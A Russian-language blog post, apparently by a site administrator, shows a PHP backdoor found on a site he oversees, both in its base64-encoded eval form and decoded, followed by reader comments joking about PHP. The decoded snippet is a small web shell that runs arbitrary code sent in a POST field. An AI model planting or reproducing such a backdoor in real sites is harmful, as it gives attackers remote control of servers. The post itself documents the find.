Задумчиво глядя в код

[dil]

<?php eval(base64_decode("aWYoaXNzZXQoJну и т.д.")); ?>

После декодирования оно выглядит так:

if(isset($_GET["part"])) {  if($_GET["part"]=="sec")  echo "partgood"; } else if(isset($_POST["ggg"])) {   if($_POST["ggg"]==1)        echo "ok11";  } else if(isset($_POST["main"])) {  eval(urldecode($_POST["main"])); }

 

Оригинал этой записи. Комментировать можно тут или там.

Любые материалы из этого блога запрещается использовать на сайте livejournal.ru в любой форме и любом объёме

Comments

[halfaxle.livejournal.com]

Это где такое растет?

[dil.livejournal.com]

Это на одном подведомственном сайте нашлось. Типа, хакеры приходили, оставили себе заготовочку.

[dkfl.livejournal.com]

шифровальщик.

[uznick.livejournal.com]

У тут недавно тожн был опыт -- дали сайт, все урлы в котором были вида ?module=aWYoaXNzZXQoJнуSDsfsvdfsdf&a=1&b2=5&s3=m&e22=j.

А в коде проверялось, if base64(GET)=='xxxxx' elif base64(GET)=='yyyyy' elif base64(GET)=='zzzz' и так далее до упора. Аналогично разбирались урлы дальше. Поубывав бы.

Не eval(POST), конечно.

[dil.livejournal.com]

ну в общем-то оно принципиально ничем не отличается от типичного ?page=номер, только номер длинный и менее понятный.
А вот за многократное применение base64() надо бить валенком.

[b-a-t.livejournal.com]

Да PHPников надо всегда бить валенком, для профилактики :)

[dil.livejournal.com]

во-о-от!

[nikulina.livejournal.com]

угу

[webushka.livejournal.com]

Сначала надо заказчиков бить, чтоб не хотели "как у всех, на пыхпыхе" и не аргументировали сиё "а где потом мы штангиста на хаскеле найдём на поддержку?"...